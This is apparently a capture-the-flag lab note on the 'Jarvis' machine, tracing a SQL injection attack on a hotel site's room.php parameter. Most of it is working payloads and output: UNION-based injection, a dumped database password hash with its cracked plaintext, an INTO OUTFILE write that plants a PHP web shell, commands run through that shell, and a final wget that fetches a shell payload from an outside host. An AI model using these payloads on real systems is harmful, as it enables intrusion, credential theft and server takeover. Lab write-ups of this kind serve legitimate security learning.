4 :80 sqli

http://jarvis.htb/room.php?cod=1

cod=1'
# page loads, but no data of room type

# used ' UNION SELECT 1-7 -- ; nothing working
# removing quote and checking

http://jarvis.htb/room.php?cod=1 UNION SELECT 1,2,3,4,5,6,7 -- -
# works query is executing but results showing same as cod=1

# using a cod= page that does not load existing data from db
http://jarvis.htb/room.php?cod=7 UNION SELECT 1,2,3,4,5,6,7 -- -
page returned contains 2,3,4,5
# all those fields are injectable

version()
10.1.37-MariaDB-0+deb9u1

select user, password from mysql.user limit 0,1
DBadmin
2D2B7A5E4E637B8FBA1D17F40318F277D29964D0
# cracked: imissyou
# can login to phpMyAdmin now.


select schema_name from information_schema.schemata limit [0-3],1
hotel
information_schema
mysql
performance_schema

# before we proceed trying to get shell directly
jarvis.htb/room.php?cod=7 UNION all SELECT 1,2,'kashz',4,5,6,7 INTO OUTFILE '/var/www/html/kashz.txt' -- -
# works
http://jarvis.htb/kashz.txt
1	2	kashz	4	5	6	7

jarvis.htb/room.php?cod=7 UNION all SELECT 1,2,"<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>'; ?>",4,5,6,7 INTO OUTFILE '/var/www/html/k.php' -- -

http://jarvis.htb/k.php?cmd=whoami;id;hostname;uname -a
1 2
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
jarvis
Linux jarvis 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux
4 5 6 7 

# can get shell using 
http://jarvis.htb/k.php?cmd=wget 10.10.16.5/web.php

Last updated